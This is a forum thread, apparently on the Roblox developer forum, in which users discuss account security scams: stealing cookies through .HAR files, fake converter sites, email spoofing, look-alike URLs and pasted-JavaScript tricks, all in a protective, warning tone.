Securing your Account PSA

I appreciate u reminding us of this

Two words, cookie grabbing. It should be mentioned anyone suspicious, e.g scammers are getting players to follow a tutorial for them just release a file that includes their cookie for example (.HAR file)

Just also to add something to the post I highly recommend you checking if the email is a real Roblox email and is not just an email address owned by Roblox being spoofed. If you do not know what email spoofing is it is basically just someone sending messages from a domain which looks like they are from a domain they don’t own (it will not really be sent from that domain it is just the way email’s work makes them look like they have came from the user) Highly unlikely with Roblox due to them only using the main domain for emails I believe however someone could spoof an email with a sub domain (e.g security.roblox.com) due to the dmarc record being set to “none”.

@lycheeperson10 Someone at Roblox might wanna look at above! Not a major issue due to the main domain name having a dmarc record set to none and the sub domain not being used really but still someone could trick others using this!

If your unsure how to check if an email is being spoofed highly or just to learn more about how emails can be spoofed recommend this YouTube vid below:

Iirc they are already encrypted although there isn’t much point in that because they are accepted as encrypted when authenticating

There is another type of hacking that is going around. Basically the hacker deceives you into pasting javascript into the search bar.

How would you do that? Roblox already enforces the httpOnly flag on security cookies to lower the chances of an xss attack. Cookies are stored on your pc so for example if a player is tricked to install something like “free robux app” they can steal the cookies

So as a general rule, all Roblox URLs will contain “[something].roblox.com”. Ie. create.roblox.com, developer.roblox.com, as well as www.roblox.com among others.

The main point is to be aware of URLs which contain variants such as “roblox.com.[something]” as an example.

But what about ro.blox.com? It’s apparently official, but it looks very suspicious.

That is official for mobile links. We are looking into standardizing them going forward. Stay tuned!

I have never had the option in the US

What exactly do you mean by this? I would like it to use share.roblox.com, but it’s completely empty. ro.blox.com returns an unauthorized error, and blox.com returns to the homepage.

edit: It changed, it used to be an empty API endpoint, but now it returns “OK”.

If you’re looking into educating users on off-site scams, you should add something regarding the .har file scam. There are two I’ve come across personally:

1- Person says they’ll give you Robux in exchange for your “avatar file”, they get you to upload a .har file to a “har to obj” converter, which in reality uploads it to a database somewhere. They usually attach a video of someone following this process, this video usually depicts a clip of someone rich/reputable doing this (which is usually just clips taken out of context, mashed together to create a surprisingly believable product) for the person being scammed to trust this person.

2- A person messaged me on discord with the same type of message (avatar to be used in-game), however instead of uploading the file to a .har to .obj “converter”, you upload the .har file directly to them on discord.

Just don’t upload any files to strangers on the internet, especially if these people message you randomly.

Do .har files contain your cookie or something? As far as I know your har file is just your avatar.

Due to the way that email is designed, it’s pretty easy to spoof emails that look like legitimate emails. The trick though, is origin, where the address to @roblox.com emails would point to an email server that originates from Roblox. Still, you can send a perfectly legit looking email using a @roblox.com email through spoofing. So, personally, this point only applies to very rudimentary phish attempts.

—

Otherwise, majority of these issues stem from Roblox’s young user base which are predominantly not actual developers where the visibility of this announcement/PSA will not reach the members who’re actively being targeted. In regards to that, the platform needs to do more in targeting these announcements to actual players instead of just developers.

This is an issue on the majority of platforms but, at some point a line needs to be drawn and the user who fell for said phish needs to take responsibility for their own actions. That is how the world works. I feel that Roblox is essentially trying to make up for the lack of online safety instruction that parents should’ve taught. Unfortunately, losing something is how you grow and hopefully, how you realize that certain actions you make can lead to serious consequences.

Regardless of how anyone tries to spin it, how a phish attempt is engineered or whatnot, this platform is specifically designed in such a way where you have to give your details to them. If they successfully get your details, it’s simply because you gave it to them. Whether you realize that or not, is completely up to you and unfortunately, probably too late.

The only way for this not to be the case is if your details are leaked either through you, a friend, etc, through a breach on Roblox’s end or if we really wanted to be radical, someone tapping your connection between your router / phone to an ISP / Tower.

I see a lot of people on this platform blame Roblox for having poor security and while, I agree in some aspects, this in particular is not their fault. Every company faces these issues and everyone is susceptible. However, most platform users take responsibility because the age deems it so. On this platform, it’s incredibly toxic and turns into “omg Roblox security sucks, give me my account back”.

Start solving this problem by getting younger users to understand / conceptualize responsibility and what it means to be responsible for your account. With the guides and such in place already regarding this topic, there’s really nothing else this platform should be doing.

The solution here is simple: If you really value your account, don’t trust anyone with it but you.

Edit: Free will on an open forum dictates expressional freedom. Take this how you want. This is my personal view on said topic. This is not aimed toward anyone. It does not mean to offend anyone. It’s simply, quite plainly, how I feel about this.

Har file (HTTP dump) contain captured data from your web browser. It’s typically used to debug, performance bottleneck review, etc but, people have been using it to grab cookies. Data, including all network information, is captured on a per-session basis. This means that any data sent from between the client (browser) and Roblox’s servers are captured on this file. This includes headers (where cookies are passed), urls, etc. If anyone asks you for a har file, they’re definitely malicious.

No longer an issue.

(Intentional)

It’s a good security measure that IP changes invalidate the cookie but it seems a bit inconsistent? Personally, using a VPN hasn’t logged me out. Even if it did, I still wouldn’t want anyone having my cookie anyway, it’s also a good idea to advise people that these scams do exist anyway.

It doesn’t depend on your IP. The title of the bug report is misleading. Its based on your location change.

Let’s say your IP Changes to another ip thats in the same state or country as you are. There’s a chance that it won’t log you out.

But let’s say your IP Changes from the US to the UK. Then it will invalidate the cookie.

Ohhh okay that makes more sense. On the chance that the person attempting to gain access to my account is somewhere near me (country is somewhat likely, province isn’t), I would still refrain from giving the cookie lmao. Regardless, it still is a good and frankly much needed security measure.